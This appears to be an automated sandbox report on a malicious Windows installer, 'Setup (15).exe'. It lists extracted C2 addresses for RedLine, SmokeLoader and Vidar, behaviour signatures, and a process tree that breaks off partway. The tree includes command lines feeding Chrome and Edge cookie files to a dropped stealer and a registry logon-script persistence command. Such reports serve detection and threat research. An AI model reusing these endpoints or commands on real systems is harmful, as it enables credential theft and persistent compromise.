Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    530s
  • max time network
    1755s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (15).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 38 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2764
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2492
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1820
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1408
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1232
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1192
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1056
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:788
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:8356
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                            2⤵
                              PID:2544
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:1004
                            • C:\Users\Admin\AppData\Local\Temp\Setup (15).exe
                              "C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"
                              1⤵
                              • Checks computer location settings
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:4060
                              • C:\Users\Admin\Documents\OdiTPtVXicU24ZtkSiaLXVv1.exe
                                "C:\Users\Admin\Documents\OdiTPtVXicU24ZtkSiaLXVv1.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1480
                              • C:\Users\Admin\Documents\u1a7Ntizyrx3DsGw0Z6uOLLe.exe
                                "C:\Users\Admin\Documents\u1a7Ntizyrx3DsGw0Z6uOLLe.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1488
                              • C:\Users\Admin\Documents\Dggu0V6PzDp0oSPm0ly32UsI.exe
                                "C:\Users\Admin\Documents\Dggu0V6PzDp0oSPm0ly32UsI.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1220
                              • C:\Users\Admin\Documents\4M4QkWbNdV9aWzgfdABNNUyh.exe
                                "C:\Users\Admin\Documents\4M4QkWbNdV9aWzgfdABNNUyh.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1736
                                • C:\Users\Admin\Documents\4M4QkWbNdV9aWzgfdABNNUyh.exe
                                  "C:\Users\Admin\Documents\4M4QkWbNdV9aWzgfdABNNUyh.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:4932
                              • C:\Users\Admin\Documents\o7y8PaluTYRsXBGMcdaM3f8f.exe
                                "C:\Users\Admin\Documents\o7y8PaluTYRsXBGMcdaM3f8f.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:1924
                                • C:\Users\Admin\Documents\o7y8PaluTYRsXBGMcdaM3f8f.exe
                                  C:\Users\Admin\Documents\o7y8PaluTYRsXBGMcdaM3f8f.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4532
                              • C:\Users\Admin\Documents\jLIpa4NuYfi3XzLjQ33DSnr1.exe
                                "C:\Users\Admin\Documents\jLIpa4NuYfi3XzLjQ33DSnr1.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:508
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 760
                                  3⤵
                                  • Program crash
                                  PID:1420
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 784
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4052
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 812
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4328
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 824
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4208
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 956
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4884
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 924
                                  3⤵
                                  • Program crash
                                  PID:5392
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1004
                                  3⤵
                                  • Program crash
                                  PID:5656
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1376
                                  3⤵
                                  • Program crash
                                  PID:5960
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1328
                                  3⤵
                                  • Program crash
                                  PID:6056
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1472
                                  3⤵
                                  • Program crash
                                  PID:4340
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1344
                                  3⤵
                                  • Program crash
                                  PID:5992
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1620
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:188
                              • C:\Users\Admin\Documents\l1rajHFvInKOcYecuLXzSNZj.exe
                                "C:\Users\Admin\Documents\l1rajHFvInKOcYecuLXzSNZj.exe"
                                2⤵
                                  PID:3840
                                  • C:\Users\Admin\AppData\Roaming\6233959.exe
                                    "C:\Users\Admin\AppData\Roaming\6233959.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:644
                                  • C:\Users\Admin\AppData\Roaming\1863824.exe
                                    "C:\Users\Admin\AppData\Roaming\1863824.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:2476
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4596
                                • C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe
                                  "C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of WriteProcessMemory
                                  PID:492
                                  • C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe
                                    C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4540
                                  • C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe
                                    C:\Users\Admin\Documents\3ZijAoZWJM0FqwKcIzjspiF1.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4700
                                • C:\Users\Admin\Documents\OTQw8K8PBCGa9Av7plgErX5x.exe
                                  "C:\Users\Admin\Documents\OTQw8K8PBCGa9Av7plgErX5x.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of WriteProcessMemory
                                  PID:404
                                  • C:\Users\Admin\Documents\OTQw8K8PBCGa9Av7plgErX5x.exe
                                    C:\Users\Admin\Documents\OTQw8K8PBCGa9Av7plgErX5x.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4552
                                • C:\Users\Admin\Documents\LjklhvPT0t6SYPGz7wOORGcK.exe
                                  "C:\Users\Admin\Documents\LjklhvPT0t6SYPGz7wOORGcK.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:360
                                • C:\Users\Admin\Documents\NzD3ayGqcKZXfo_A4NoMYTBX.exe
                                  "C:\Users\Admin\Documents\NzD3ayGqcKZXfo_A4NoMYTBX.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:740
                                • C:\Users\Admin\Documents\YFMclukOUyNUWnXE2sx08OAb.exe
                                  "C:\Users\Admin\Documents\YFMclukOUyNUWnXE2sx08OAb.exe"
                                  2⤵
                                    PID:3156
                                  • C:\Users\Admin\Documents\V0g8lO2tIwZsTz1zLdBgaf_X.exe
                                    "C:\Users\Admin\Documents\V0g8lO2tIwZsTz1zLdBgaf_X.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:580
                                  • C:\Users\Admin\Documents\tGkL46ljPh0k5k5HqhXuVtJG.exe
                                    "C:\Users\Admin\Documents\tGkL46ljPh0k5k5HqhXuVtJG.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:3260
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 664
                                      3⤵
                                      • Program crash
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4716
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 676
                                      3⤵
                                      • Program crash
                                      PID:4480
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 720
                                      3⤵
                                      • Program crash
                                      PID:3640
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 568
                                      3⤵
                                      • Program crash
                                      PID:4520
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1120
                                      3⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4548
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1168
                                      3⤵
                                      • Program crash
                                      PID:2296
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1108
                                      3⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:4320
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1172
                                      3⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2416
                                  • C:\Users\Admin\Documents\kW883jJVm38MUeKDindVSXfg.exe
                                    "C:\Users\Admin\Documents\kW883jJVm38MUeKDindVSXfg.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:3628
                                    • C:\Users\Admin\Documents\kW883jJVm38MUeKDindVSXfg.exe
                                      "C:\Users\Admin\Documents\kW883jJVm38MUeKDindVSXfg.exe" -q
                                      3⤵
                                        PID:4872
                                    • C:\Users\Admin\Documents\MsiOu1jicR4zv0zMJNvP0ocq.exe
                                      "C:\Users\Admin\Documents\MsiOu1jicR4zv0zMJNvP0ocq.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2520
                                    • C:\Users\Admin\Documents\gc3f43hrRSJDD9AQNmYxGzdg.exe
                                      "C:\Users\Admin\Documents\gc3f43hrRSJDD9AQNmYxGzdg.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:3548
                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                        3⤵
                                          PID:4860
                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4828
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                            • Executes dropped EXE
                                            PID:964
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:1312
                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4916
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:4284
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:3336
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5688
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4620
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 4916 -s 1532
                                                  4⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  PID:5880
                                            • C:\Users\Admin\Documents\DVkjbdOLrf9BHs92tIqzxG68.exe
                                              "C:\Users\Admin\Documents\DVkjbdOLrf9BHs92tIqzxG68.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4952
                                            • C:\Users\Admin\Documents\MJLsc5l6nPvKTN4TNVzDHc8y.exe
                                              "C:\Users\Admin\Documents\MJLsc5l6nPvKTN4TNVzDHc8y.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4932
                                              • C:\Users\Admin\AppData\Local\Temp\is-TUU3B.tmp\MJLsc5l6nPvKTN4TNVzDHc8y.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-TUU3B.tmp\MJLsc5l6nPvKTN4TNVzDHc8y.tmp" /SL5="$2025C,138429,56832,C:\Users\Admin\Documents\MJLsc5l6nPvKTN4TNVzDHc8y.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of FindShellTrayWindow
                                                PID:4264
                                                • C:\Users\Admin\AppData\Local\Temp\is-GPK0R.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-GPK0R.tmp\Setup.exe" /Verysilent
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  PID:3472
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:3156
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 824
                                                      6⤵
                                                      • Program crash
                                                      PID:6720
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 800
                                                      6⤵
                                                      • Program crash
                                                      PID:1312
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 1088
                                                      6⤵
                                                      • Program crash
                                                      PID:6896
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 1056
                                                      6⤵
                                                      • Program crash
                                                      PID:7284
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:500
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281722 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                      6⤵
                                                        PID:7932
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4480
                                                      • C:\Users\Admin\AppData\Local\Temp\is-JVOT2.tmp\WEATHER Manager.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-JVOT2.tmp\WEATHER Manager.tmp" /SL5="$4026C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                        6⤵
                                                          PID:1548
                                                          • C:\Users\Admin\AppData\Local\Temp\is-IEHL4.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-IEHL4.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:3328
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-IEHL4.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-IEHL4.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281722 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                              8⤵
                                                                PID:5488
                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                          5⤵
                                                            PID:4984
                                                            • C:\Users\Admin\AppData\Local\Temp\is-TT7VE.tmp\Inlog.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-TT7VE.tmp\Inlog.tmp" /SL5="$20274,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:3672
                                                              • C:\Users\Admin\AppData\Local\Temp\is-S1V79.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-S1V79.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                7⤵
                                                                  PID:7104
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PVDT6.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PVDT6.tmp\Setup.tmp" /SL5="$30462,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-S1V79.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:7020
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2HI03.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                      9⤵
                                                                        PID:6268
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          10⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          PID:1164
                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-2HI03.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                          10⤵
                                                                          • Drops file in Windows directory
                                                                          PID:5692
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                        9⤵
                                                                          PID:9176
                                                                          • C:\Windows\SysWOW64\reg.exe
